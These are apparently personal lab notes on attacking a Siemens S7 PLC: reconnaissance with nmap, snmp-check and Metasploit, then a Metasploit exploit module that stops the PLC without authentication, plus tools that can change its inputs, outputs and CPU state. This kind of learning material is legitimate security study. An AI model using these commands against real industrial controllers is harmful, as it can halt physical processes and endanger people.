06-real_hardware
06-real_hardware
Nota importada desde Inbox durante consolidacion bulk.
Real S7 Hardware Testing
Recon and fingerprint with NMAP
lets find the Siemens physical device with sudo netdiscover -r 10.1.0.0/24
then nmap to scan tcp ports on the IP address
sudo nmap 10.1.0.11 -Pn -p 1-65535
and udp ports
sudo nmap 10.1.0.11 -Pn -sU -F for the 100 most frequent UDP ports
We found UDP port 161 open
SNMP Check
snmp-check 10.1.0.11 gives results showing
- cpu type
- model number
- firmware number
- interfaces and slots
- mac address
- etc.
NMAP and its scripting engine
From an earlier nmap scan..
We found tcp port 102 open as well
Probe it with sudo nmap 10.1.0.11 -Pn -p 102 -sV
And use nmap scripting engine with
sudo nmap 10.1.0.11 -Pn -p --script s7-info.nse
This yields:
- module details
- hardware details
- version number
- mac address
Metasploit
start metasploit with
sudo msfconsole
then search Siemens
To use the Profinet Scanner use the cooresponding #. Based on my results I typed use 5
This module uses layer 2 packets for Profinet discovery to detect Siemens devices on a network.
Then type run to retrieve further information from the S7 PLC.
This will give results.
One can also use searchsploit s7 and then use the use hardware/remote/38964.rb after copying the files covered earlier in configuring searchsploit. This sploit can start and stops the S7 PLC. This is how:
setg RHOST 10.1.0.11 to set the host address.
set MODE STOP to use the STOP command
run to run the stop command
BOOM!! The PLC should stop running without any authentication!
PLCSCAN
sudo python2 plcscan.py 10.1.0.11 to use plcsan.
This check whether port 102 or 502 is open on the target and extracts additiona info
ICSSecurityScripts
Navigate to the folder and then
sudo python3 SiemensScan.py to run the script.
This tool can:
-
perform level 2 profinet discovery
-
configure network
-
retreive information
-
manipulate inputs, outputs and registers
-
toggle LEDs
-
flip CPU State
-
change device name
Next Section -> Gas Station Controller